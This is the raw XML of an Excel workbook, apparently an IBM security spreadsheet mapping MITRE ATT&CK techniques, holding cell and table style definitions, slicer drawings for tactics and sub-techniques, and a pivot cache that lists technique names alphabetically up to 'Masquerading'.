          <color rgb="FF393939"/>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numFmt numFmtId="168" formatCode="yyyy\-mm\-dd;@"/>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ill>
        <patternFill>
          <fgColor indexed="64"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF24A148"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFF1C21B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF832B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <b val="0"/>
        <i val="0"/>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color rgb="FFFFFFFF"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FF24A148"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF832B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFF1C21B"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <bgColor rgb="FFDA1E28"/>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outline="0">
        <top style="medium">
          <color rgb="FF393939"/>
        </top>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style="thin">
          <color rgb="FF393939"/>
        </right>
        <top style="thin">
          <color rgb="FF393939"/>
        </top>
        <bottom style="thin">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font>
        <strike val="0"/>
        <outline val="0"/>
        <shadow val="0"/>
        <u val="none"/>
        <vertAlign val="baseline"/>
        <sz val="12"/>
        <color rgb="FFFF0000"/>
        <name val="IBM Plex Sans"/>
        <family val="2"/>
        <scheme val="none"/>
      </font>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thin">
          <color rgb="FF393939"/>
        </left>
        <right/>
        <top style="thin">
          <color rgb="FF393939"/>
        </top>
        <bottom style="thin">
          <color rgb="FF393939"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <border>
        <top style="thin">
          <color rgb="FF393939"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <fgColor rgb="FF393939"/>
          <bgColor rgb="FFE5E5E5"/>
        </patternFill>
      </fill>
      <border>
        <left style="thick">
          <color rgb="FFE5E5E5"/>
        </left>
        <right style="thick">
          <color rgb="FFE5E5E5"/>
        </right>
        <top style="thick">
          <color rgb="FFE5E5E5"/>
        </top>
        <bottom style="thick">
          <color rgb="FFE5E5E5"/>
        </bottom>
        <vertical style="thick">
          <color rgb="FFE5E5E5"/>
        </vertical>
        <horizontal style="thick">
          <color rgb="FFE5E5E5"/>
        </horizontal>
      </border>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF262626"/>
          <bgColor theme="0"/>
        </patternFill>
      </fill>
      <border>
        <left style="thick">
          <color theme="0"/>
        </left>
        <right style="thick">
          <color theme="0"/>
        </right>
        <top style="thick">
          <color theme="0"/>
        </top>
        <bottom style="thick">
          <color theme="0"/>
        </bottom>
        <vertical style="thick">
          <color theme="0"/>
        </vertical>
        <horizontal style="thick">
          <color theme="0"/>
        </horizontal>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1" tint="0.14993743705557422"/>
          <bgColor rgb="FFE0E0E0"/>
        </patternFill>
      </fill>
      <border>
        <top style="medium">
          <color theme="0"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1"/>
          <bgColor rgb="FFE0E0E0"/>
        </patternFill>
      </fill>
      <border>
        <bottom style="medium">
          <color theme="0"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <strike val="0"/>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1" tint="0.44999542222357858"/>
          <bgColor theme="1" tint="0.44999542222357858"/>
        </patternFill>
      </fill>
      <border>
        <left style="thick">
          <color rgb="FFE0E0E0"/>
        </left>
        <right style="thick">
          <color rgb="FFE0E0E0"/>
        </right>
        <top style="thick">
          <color rgb="FFE0E0E0"/>
        </top>
        <bottom style="thick">
          <color rgb="FFE0E0E0"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1" tint="0.249977111117893"/>
          <bgColor theme="1" tint="0.249977111117893"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill>
          <fgColor rgb="FF393939"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
      <border diagonalUp="0" diagonalDown="0">
        <left style="thick">
          <color rgb="FF393939"/>
        </left>
        <right style="thick">
          <color rgb="FF393939"/>
        </right>
        <top style="thick">
          <color rgb="FF393939"/>
        </top>
        <bottom style="thick">
          <color rgb="FF393939"/>
        </bottom>
        <vertical style="thick">
          <color rgb="FF393939"/>
        </vertical>
        <horizontal style="thick">
          <color rgb="FF393939"/>
        </horizontal>
      </border>
    </dxf>
    <dxf>
      <font>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor rgb="FF262626"/>
          <bgColor rgb="FF262626"/>
        </patternFill>
      </fill>
      <border diagonalUp="0" diagonalDown="0">
        <left style="thick">
          <color rgb="FF262626"/>
        </left>
        <right style="thick">
          <color rgb="FF262626"/>
        </right>
        <top style="thick">
          <color rgb="FF262626"/>
        </top>
        <bottom style="thick">
          <color rgb="FF262626"/>
        </bottom>
        <vertical style="thick">
          <color rgb="FF262626"/>
        </vertical>
        <horizontal style="thick">
          <color rgb="FF262626"/>
        </horizontal>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1" tint="0.249977111117893"/>
          <bgColor theme="1" tint="0.249977111117893"/>
        </patternFill>
      </fill>
      <border>
        <left style="medium">
          <color theme="0"/>
        </left>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1" tint="0.249977111117893"/>
          <bgColor theme="1" tint="0.249977111117893"/>
        </patternFill>
      </fill>
      <border>
        <right style="medium">
          <color theme="0"/>
        </right>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1" tint="0.14996795556505021"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
      <border>
        <top style="medium">
          <color theme="0"/>
        </top>
      </border>
    </dxf>
    <dxf>
      <font>
        <b/>
        <i val="0"/>
        <color theme="0"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1"/>
          <bgColor rgb="FF393939"/>
        </patternFill>
      </fill>
      <border>
        <bottom style="medium">
          <color theme="0"/>
        </bottom>
      </border>
    </dxf>
    <dxf>
      <font>
        <color auto="1"/>
      </font>
      <fill>
        <patternFill patternType="solid">
          <fgColor theme="1" tint="0.44999542222357858"/>
          <bgColor theme="1" tint="0.44999542222357858"/>
        </patternFill>
      </fill>
      <border>
        <left style="thick">
          <color rgb="FF262626"/>
        </left>
        <right style="thick">
          <color rgb="FF262626"/>
        </right>
        <top style="thick">
          <color rgb="FF262626"/>
        </top>
        <bottom style="thick">
          <color rgb="FF262626"/>
        </bottom>
      </border>
    </dxf>
  </dxfs>
  <tableStyles count="2" defaultTableStyle="TableStyleMedium2" defaultPivotStyle="PivotStyleLight16">
    <tableStyle name="IBM Security Table (Dark)" pivot="0" count="8" xr9:uid="{D3071CFC-AC3F-4D0F-B7A8-FE7B9C288725}">
      <tableStyleElement type="wholeTable" dxfId="276"/>
      <tableStyleElement type="headerRow" dxfId="275"/>
      <tableStyleElement type="totalRow" dxfId="274"/>
      <tableStyleElement type="firstColumn" dxfId="273"/>
      <tableStyleElement type="lastColumn" dxfId="272"/>
      <tableStyleElement type="firstRowStripe" dxfId="271"/>
      <tableStyleElement type="secondRowStripe" dxfId="270"/>
      <tableStyleElement type="firstColumnStripe" dxfId="269"/>
    </tableStyle>
    <tableStyle name="IBM Security Table (Light)" pivot="0" count="5" xr9:uid="{D7DF4EEC-AB3D-45AF-A6AE-F8DBCCA9C403}">
      <tableStyleElement type="wholeTable" dxfId="268"/>
      <tableStyleElement type="headerRow" dxfId="267"/>
      <tableStyleElement type="totalRow" dxfId="266"/>
      <tableStyleElement type="firstRowStripe" dxfId="265"/>
      <tableStyleElement type="secondRowStripe" dxfId="264"/>
    </tableStyle>
  </tableStyles>
  <colors>
    <mruColors>
      <color rgb="FF0062FF"/>
      <color rgb="FFDA1E28"/>
      <color rgb="FF393939"/>
      <color rgb="FFFFFFFF"/>
      <color rgb="FFE0E0E0"/>
      <color rgb="FF24A148"/>
      <color rgb="FFF1C21B"/>
      <color rgb="FFFF832B"/>
      <color rgb="FF000000"/>
      <color rgb="FFDAED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eetMetadata" Target="metadata.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item8.xml"/><Relationship Id="rId21" Type="http://schemas.microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache2.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17/06/relationships/rdRichValueTypes" Target="richData/rdRichValueTypes.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microsoft.com/office/2017/06/relationships/rdRichValueStructure" Target="richData/rdrichvaluestructure.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microsoft.com/office/2017/06/relationships/rdRichValue" Target="richData/rdrichvalue.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microsoft.com/office/2007/relationships/slicerCache" Target="slicerCaches/slicerCache1.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oneCell">
    <xdr:from>
      <xdr:col>2</xdr:col>
      <xdr:colOff>5581650</xdr:colOff>
      <xdr:row>575</xdr:row>
      <xdr:rowOff>85725</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>2</xdr:col>
      <xdr:colOff>7620000</xdr:colOff>
      <xdr:row>588</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:to>
    <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
      <mc:Choice Requires="a14">
        <xdr:graphicFrame macro="">
          <xdr:nvGraphicFramePr>
            <xdr:cNvPr id="2" name="is sub-technique">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{773284DF-B042-4284-A634-E6C6D4A83AFD}"/>
                </a:ext>
              </a:extLst>
            </xdr:cNvPr>
            <xdr:cNvGraphicFramePr/>
          </xdr:nvGraphicFramePr>
          <xdr:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </xdr:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.microsoft.com/office/drawing/2010/slicer">
              <sle:slicer xmlns:sle="http://schemas.microsoft.com/office/drawing/2010/slicer" name="is sub-technique"/>
            </a:graphicData>
          </a:graphic>
        </xdr:graphicFrame>
      </mc:Choice>
      <mc:Fallback xmlns="">
        <xdr:sp macro="" textlink="">
          <xdr:nvSpPr>
            <xdr:cNvPr id="0" name=""/>
            <xdr:cNvSpPr>
              <a:spLocks noTextEdit="1"/>
            </xdr:cNvSpPr>
          </xdr:nvSpPr>
          <xdr:spPr>
            <a:xfrm>
              <a:off x="11953875" y="115100100"/>
              <a:ext cx="203835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5695950</xdr:colOff>
      <xdr:row>559</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>573</xdr:row>
      <xdr:rowOff>57150</xdr:rowOff>
    </xdr:to>
    <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
      <mc:Choice Requires="a14">
        <xdr:graphicFrame macro="">
          <xdr:nvGraphicFramePr>
            <xdr:cNvPr id="3" name="tactics">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BDB5229-B3C1-47D2-A159-9BE7B69CA28B}"/>
                </a:ext>
              </a:extLst>
            </xdr:cNvPr>
            <xdr:cNvGraphicFramePr/>
          </xdr:nvGraphicFramePr>
          <xdr:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </xdr:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.microsoft.com/office/drawing/2010/slicer">
              <sle:slicer xmlns:sle="http://schemas.microsoft.com/office/drawing/2010/slicer" name="tactics"/>
            </a:graphicData>
          </a:graphic>
        </xdr:graphicFrame>
      </mc:Choice>
      <mc:Fallback xmlns="">
        <xdr:sp macro="" textlink="">
          <xdr:nvSpPr>
            <xdr:cNvPr id="0" name=""/>
            <xdr:cNvSpPr>
              <a:spLocks noTextEdit="1"/>
            </xdr:cNvSpPr>
          </xdr:nvSpPr>
          <xdr:spPr>
            <a:xfrm>
              <a:off x="14125575" y="11186160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dang Sen" refreshedDate="44417.596835532408" createdVersion="6" refreshedVersion="6" minRefreshableVersion="3" recordCount="552" xr:uid="{2BFCF571-8812-42E6-9455-770C84F3EDDB}">
  <cacheSource type="worksheet">
    <worksheetSource name="=MT"/>
  </cacheSource>
  <cacheFields count="17">
    <cacheField name="ID" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="name" numFmtId="0">
      <sharedItems count="552">
        <s v="Abuse Elevation Control Mechanism"/>
        <s v="Abuse Elevation Control Mechanism: Bypass User Account Control"/>
        <s v="Abuse Elevation Control Mechanism: Elevated Execution with Prompt"/>
        <s v="Abuse Elevation Control Mechanism: Setuid and Setgid"/>
        <s v="Abuse Elevation Control Mechanism: Sudo and Sudo Caching"/>
        <s v="Access Token Manipulation"/>
        <s v="Access Token Manipulation: Create Process with Token"/>
        <s v="Access Token Manipulation: Make and Impersonate Token"/>
        <s v="Access Token Manipulation: Parent PID Spoofing"/>
        <s v="Access Token Manipulation: SID-History Injection"/>
        <s v="Access Token Manipulation: Token Impersonation/Theft"/>
        <s v="Account Access Removal"/>
        <s v="Account Discovery"/>
        <s v="Account Discovery: Cloud Account"/>
        <s v="Account Discovery: Domain Account"/>
        <s v="Account Discovery: Email Account"/>
        <s v="Account Discovery: Local Account"/>
        <s v="Account Manipulation"/>
        <s v="Account Manipulation: Add Office 365 Global Administrator Role"/>
        <s v="Account Manipulation: Additional Cloud Credentials"/>
        <s v="Account Manipulation: Exchange Email Delegate Permissions"/>
        <s v="Account Manipulation: SSH Authorized Keys"/>
        <s v="Acquire Infrastructure"/>
        <s v="Acquire Infrastructure: Botnet"/>
        <s v="Acquire Infrastructure: DNS Server"/>
        <s v="Acquire Infrastructure: Domains"/>
        <s v="Acquire Infrastructure: Server"/>
        <s v="Acquire Infrastructure: Virtual Private Server"/>
        <s v="Acquire Infrastructure: Web Services"/>
        <s v="Active Scanning"/>
        <s v="Active Scanning: Scanning IP Blocks"/>
        <s v="Active Scanning: Vulnerability Scanning"/>
        <s v="Application Layer Protocol"/>
        <s v="Application Layer Protocol: DNS"/>
        <s v="Application Layer Protocol: File Transfer Protocols"/>
        <s v="Application Layer Protocol: Mail Protocols"/>
        <s v="Application Layer Protocol: Web Protocols"/>
        <s v="Application Window Discovery"/>
        <s v="Archive Collected Data"/>
        <s v="Archive Collected Data: Archive via Custom Method"/>
        <s v="Archive Collected Data: Archive via Library"/>
        <s v="Archive Collected Data: Archive via Utility"/>
        <s v="Audio Capture"/>
        <s v="Automated Collection"/>
        <s v="Automated Exfiltration"/>
        <s v="Automated Exfiltration: Traffic Duplication"/>
        <s v="BITS Jobs"/>
        <s v="Boot or Logon Autostart Execution"/>
        <s v="Boot or Logon Autostart Execution: Active Setup"/>
        <s v="Boot or Logon Autostart Execution: Authentication Package"/>
        <s v="Boot or Logon Autostart Execution: Kernel Modules and Extensions"/>
        <s v="Boot or Logon Autostart Execution: LSASS Driver"/>
        <s v="Boot or Logon Autostart Execution: Plist Modification"/>
        <s v="Boot or Logon Autostart Execution: Port Monitors"/>
        <s v="Boot or Logon Autostart Execution: Print Processors"/>
        <s v="Boot or Logon Autostart Execution: Re-opened Applications"/>
        <s v="Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"/>
        <s v="Boot or Logon Autostart Execution: Security Support Provider"/>
        <s v="Boot or Logon Autostart Execution: Shortcut Modification"/>
        <s v="Boot or Logon Autostart Execution: Time Providers"/>
        <s v="Boot or Logon Autostart Execution: Winlogon Helper DLL"/>
        <s v="Boot or Logon Autostart Execution: XDG Autostart Entries"/>
        <s v="Boot or Logon Initialization Scripts"/>
        <s v="Boot or Logon Initialization Scripts: Logon Script (Mac)"/>
        <s v="Boot or Logon Initialization Scripts: Logon Script (Windows)"/>
        <s v="Boot or Logon Initialization Scripts: Network Logon Script"/>
        <s v="Boot or Logon Initialization Scripts: RC Scripts"/>
        <s v="Boot or Logon Initialization Scripts: Startup Items"/>
        <s v="Browser Bookmark Discovery"/>
        <s v="Browser Extensions"/>
        <s v="Brute Force"/>
        <s v="Brute Force: Credential Stuffing"/>
        <s v="Brute Force: Password Cracking"/>
        <s v="Brute Force: Password Guessing"/>
        <s v="Brute Force: Password Spraying"/>
        <s v="Build Image on Host"/>
        <s v="Clipboard Data"/>
        <s v="Cloud Infrastructure Discovery"/>
        <s v="Cloud Service Dashboard"/>
        <s v="Cloud Service Discovery"/>
        <s v="Command and Scripting Interpreter"/>
        <s v="Command and Scripting Interpreter: AppleScript"/>
        <s v="Command and Scripting Interpreter: JavaScript"/>
        <s v="Command and Scripting Interpreter: Network Device CLI"/>
        <s v="Command and Scripting Interpreter: PowerShell"/>
        <s v="Command and Scripting Interpreter: Python"/>
        <s v="Command and Scripting Interpreter: Unix Shell"/>
        <s v="Command and Scripting Interpreter: Visual Basic"/>
        <s v="Command and Scripting Interpreter: Windows Command Shell"/>
        <s v="Communication Through Removable Media"/>
        <s v="Compromise Accounts"/>
        <s v="Compromise Accounts: Email Accounts"/>
        <s v="Compromise Accounts: Social Media Accounts"/>
        <s v="Compromise Client Software Binary"/>
        <s v="Compromise Infrastructure"/>
        <s v="Compromise Infrastructure: Botnet"/>
        <s v="Compromise Infrastructure: DNS Server"/>
        <s v="Compromise Infrastructure: Domains"/>
        <s v="Compromise Infrastructure: Server"/>
        <s v="Compromise Infrastructure: Virtual Private Server"/>
        <s v="Compromise Infrastructure: Web Services"/>
        <s v="Container Administration Command"/>
        <s v="Container and Resource Discovery"/>
        <s v="Create Account"/>
        <s v="Create Account: Cloud Account"/>
        <s v="Create Account: Domain Account"/>
        <s v="Create Account: Local Account"/>
        <s v="Create or Modify System Process"/>
        <s v="Create or Modify System Process: Launch Agent"/>
        <s v="Create or Modify System Process: Launch Daemon"/>
        <s v="Create or Modify System Process: Systemd Service"/>
        <s v="Create or Modify System Process: Windows Service"/>
        <s v="Credentials from Password Stores"/>
        <s v="Credentials from Password Stores: Credentials from Web Browsers"/>
        <s v="Credentials from Password Stores: Keychain"/>
        <s v="Credentials from Password Stores: Password Managers"/>
        <s v="Credentials from Password Stores: Securityd Memory"/>
        <s v="Credentials from Password Stores: Windows Credential Manager"/>
        <s v="Data Destruction"/>
        <s v="Data Encoding"/>
        <s v="Data Encoding: Non-Standard Encoding"/>
        <s v="Data Encoding: Standard Encoding"/>
        <s v="Data Encrypted for Impact"/>
        <s v="Data Manipulation"/>
        <s v="Data Manipulation: Runtime Data Manipulation"/>
        <s v="Data Manipulation: Stored Data Manipulation"/>
        <s v="Data Manipulation: Transmitted Data Manipulation"/>
        <s v="Data Obfuscation"/>
        <s v="Data Obfuscation: Junk Data"/>
        <s v="Data Obfuscation: Protocol Impersonation"/>
        <s v="Data Obfuscation: Steganography"/>
        <s v="Data Staged"/>
        <s v="Data Staged: Local Data Staging"/>
        <s v="Data Staged: Remote Data Staging"/>
        <s v="Data Transfer Size Limits"/>
        <s v="Data from Cloud Storage Object"/>
        <s v="Data from Configuration Repository"/>
        <s v="Data from Configuration Repository: Network Device Configuration Dump"/>
        <s v="Data from Configuration Repository: SNMP (MIB Dump)"/>
        <s v="Data from Information Repositories"/>
        <s v="Data from Information Repositories: Confluence"/>
        <s v="Data from Information Repositories: Sharepoint"/>
        <s v="Data from Local System"/>
        <s v="Data from Network Shared Drive"/>
        <s v="Data from Removable Media"/>
        <s v="Defacement"/>
        <s v="Defacement: External Defacement"/>
        <s v="Defacement: Internal Defacement"/>
        <s v="Deobfuscate/Decode Files or Information"/>
        <s v="Deploy Container"/>
        <s v="Develop Capabilities"/>
        <s v="Develop Capabilities: Code Signing Certificates"/>
        <s v="Develop Capabilities: Digital Certificates"/>
        <s v="Develop Capabilities: Exploits"/>
        <s v="Develop Capabilities: Malware"/>
        <s v="Direct Volume Access"/>
        <s v="Disk Wipe"/>
        <s v="Disk Wipe: Disk Content Wipe"/>
        <s v="Disk Wipe: Disk Structure Wipe"/>
        <s v="Domain Policy Modification"/>
        <s v="Domain Policy Modification: Domain Trust Modification"/>
        <s v="Domain Policy Modification: Group Policy Modification"/>
        <s v="Domain Trust Discovery"/>
        <s v="Drive-by Compromise"/>
        <s v="Dynamic Resolution"/>
        <s v="Dynamic Resolution: DNS Calculation"/>
        <s v="Dynamic Resolution: Domain Generation Algorithms"/>
        <s v="Dynamic Resolution: Fast Flux DNS"/>
        <s v="Email Collection"/>
        <s v="Email Collection: Email Forwarding Rule"/>
        <s v="Email Collection: Local Email Collection"/>
        <s v="Email Collection: Remote Email Collection"/>
        <s v="Encrypted Channel"/>
        <s v="Encrypted Channel: Asymmetric Cryptography"/>
        <s v="Encrypted Channel: Symmetric Cryptography"/>
        <s v="Endpoint Denial of Service"/>
        <s v="Endpoint Denial of Service: Application Exhaustion Flood"/>
        <s v="Endpoint Denial of Service: Application or System Exploitation"/>
        <s v="Endpoint Denial of Service: OS Exhaustion Flood"/>
        <s v="Endpoint Denial of Service: Service Exhaustion Flood"/>
        <s v="Escape to Host"/>
        <s v="Establish Accounts"/>
        <s v="Establish Accounts: Email Accounts"/>
        <s v="Establish Accounts: Social Media Accounts"/>
        <s v="Event Triggered Execution"/>
        <s v="Event Triggered Execution: Accessibility Features"/>
        <s v="Event Triggered Execution: AppCert DLLs"/>
        <s v="Event Triggered Execution: AppInit DLLs"/>
        <s v="Event Triggered Execution: Application Shimming"/>
        <s v="Event Triggered Execution: Change Default File Association"/>
        <s v="Event Triggered Execution: Component Object Model Hijacking"/>
        <s v="Event Triggered Execution: Emond"/>
        <s v="Event Triggered Execution: Image File Execution Options Injection"/>
        <s v="Event Triggered Execution: LC_LOAD_DYLIB Addition"/>
        <s v="Event Triggered Execution: Netsh Helper DLL"/>
        <s v="Event Triggered Execution: PowerShell Profile"/>
        <s v="Event Triggered Execution: Screensaver"/>
        <s v="Event Triggered Execution: Trap"/>
        <s v="Event Triggered Execution: Unix Shell Configuration Modification"/>
        <s v="Event Triggered Execution: Windows Management Instrumentation Event Subscription"/>
        <s v="Execution Guardrails"/>
        <s v="Execution Guardrails: Environmental Keying"/>
        <s v="Exfiltration Over Alternative Protocol"/>
        <s v="Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol"/>
        <s v="Exfiltration Over Alternative Protocol: Exfiltration Over Symmetric Encrypted Non-C2 Protocol"/>
        <s v="Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"/>
        <s v="Exfiltration Over C2 Channel"/>
        <s v="Exfiltration Over Other Network Medium"/>
        <s v="Exfiltration Over Other Network Medium: Exfiltration Over Bluetooth"/>
        <s v="Exfiltration Over Physical Medium"/>
        <s v="Exfiltration Over Physical Medium: Exfiltration over USB"/>
        <s v="Exfiltration Over Web Service"/>
        <s v="Exfiltration Over Web Service: Exfiltration to Cloud Storage"/>
        <s v="Exfiltration Over Web Service: Exfiltration to Code Repository"/>
        <s v="Exploit Public-Facing Application"/>
        <s v="Exploitation for Client Execution"/>
        <s v="Exploitation for Credential Access"/>
        <s v="Exploitation for Defense Evasion"/>
        <s v="Exploitation for Privilege Escalation"/>
        <s v="Exploitation of Remote Services"/>
        <s v="External Remote Services"/>
        <s v="Fallback Channels"/>
        <s v="File and Directory Discovery"/>
        <s v="File and Directory Permissions Modification"/>
        <s v="File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification"/>
        <s v="File and Directory Permissions Modification: Windows File and Directory Permissions Modification"/>
        <s v="Firmware Corruption"/>
        <s v="Forced Authentication"/>
        <s v="Forge Web Credentials"/>
        <s v="Forge Web Credentials: SAML Tokens"/>
        <s v="Forge Web Credentials: Web Cookies"/>
        <s v="Gather Victim Host Information"/>
        <s v="Gather Victim Host Information: Client Configurations"/>
        <s v="Gather Victim Host Information: Firmware"/>
        <s v="Gather Victim Host Information: Hardware"/>
        <s v="Gather Victim Host Information: Software"/>
        <s v="Gather Victim Identity Information"/>
        <s v="Gather Victim Identity Information: Credentials"/>
        <s v="Gather Victim Identity Information: Email Addresses"/>
        <s v="Gather Victim Identity Information: Employee Names"/>
        <s v="Gather Victim Network Information"/>
        <s v="Gather Victim Network Information: DNS"/>
        <s v="Gather Victim Network Information: Domain Properties"/>
        <s v="Gather Victim Network Information: IP Addresses"/>
        <s v="Gather Victim Network Information: Network Security Appliances"/>
        <s v="Gather Victim Network Information: Network Topology"/>
        <s v="Gather Victim Network Information: Network Trust Dependencies"/>
        <s v="Gather Victim Org Information"/>
        <s v="Gather Victim Org Information: Business Relationships"/>
        <s v="Gather Victim Org Information: Determine Physical Locations"/>
        <s v="Gather Victim Org Information: Identify Business Tempo"/>
        <s v="Gather Victim Org Information: Identify Roles"/>
        <s v="Hardware Additions"/>
        <s v="Hide Artifacts"/>
        <s v="Hide Artifacts: Hidden File System"/>
        <s v="Hide Artifacts: Hidden Files and Directories"/>
        <s v="Hide Artifacts: Hidden Users"/>
        <s v="Hide Artifacts: Hidden Window"/>
        <s v="Hide Artifacts: NTFS File Attributes"/>
        <s v="Hide Artifacts: Run Virtual Instance"/>
        <s v="Hide Artifacts: VBA Stomping"/>
        <s v="Hijack Execution Flow"/>
        <s v="Hijack Execution Flow: COR_PROFILER"/>
        <s v="Hijack Execution Flow: DLL Search Order Hijacking"/>
        <s v="Hijack Execution Flow: DLL Side-Loading"/>
        <s v="Hijack Execution Flow: Dylib Hijacking"/>
        <s v="Hijack Execution Flow: Dynamic Linker Hijacking"/>
        <s v="Hijack Execution Flow: Executable Installer File Permissions Weakness"/>
        <s v="Hijack Execution Flow: Path Interception by PATH Environment Variable"/>
        <s v="Hijack Execution Flow: Path Interception by Search Order Hijacking"/>
        <s v="Hijack Execution Flow: Path Interception by Unquoted Path"/>
        <s v="Hijack Execution Flow: Services File Permissions Weakness"/>
        <s v="Hijack Execution Flow: Services Registry Permissions Weakness"/>
        <s v="Impair Defenses"/>
        <s v="Impair Defenses: Disable Cloud Logs"/>
        <s v="Impair Defenses: Disable Windows Event Logging"/>
        <s v="Impair Defenses: Disable or Modify Cloud Firewall"/>
        <s v="Impair Defenses: Disable or Modify System Firewall"/>
        <s v="Impair Defenses: Disable or Modify Tools"/>
        <s v="Impair Defenses: Impair Command History Logging"/>
        <s v="Impair Defenses: Indicator Blocking"/>
        <s v="Implant Internal Image"/>
        <s v="Indicator Removal on Host"/>
        <s v="Indicator Removal on Host: Clear Command History"/>
        <s v="Indicator Removal on Host: Clear Linux or Mac System Logs"/>
        <s v="Indicator Removal on Host: Clear Windows Event Logs"/>
        <s v="Indicator Removal on Host: File Deletion"/>
        <s v="Indicator Removal on Host: Network Share Connection Removal"/>
        <s v="Indicator Removal on Host: Timestomp"/>
        <s v="Indirect Command Execution"/>
        <s v="Ingress Tool Transfer"/>
        <s v="Inhibit System Recovery"/>
        <s v="Input Capture"/>
        <s v="Input Capture: Credential API Hooking"/>
        <s v="Input Capture: GUI Input Capture"/>
        <s v="Input Capture: Keylogging"/>
        <s v="Input Capture: Web Portal Capture"/>
        <s v="Inter-Process Communication"/>
        <s v="Inter-Process Communication: Component Object Model"/>
        <s v="Inter-Process Communication: Dynamic Data Exchange"/>
        <s v="Internal Spearphishing"/>
        <s v="Lateral Tool Transfer"/>
        <s v="Man in the Browser"/>
        <s v="Man-in-the-Middle"/>
        <s v="Man-in-the-Middle: ARP Cache Poisoning"/>
        <s v="Man-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay"/>
        <s v="Masquerading"/>
        <s v="Masquerading: Invalid Code Signature"/>
        <s v="Masquerading: Masquerade Task or Service"/>
        <s v="Masquerading: Match Legitimate Name or Location"/>
        <s v="Masquerading: Rename System Utilities"/>
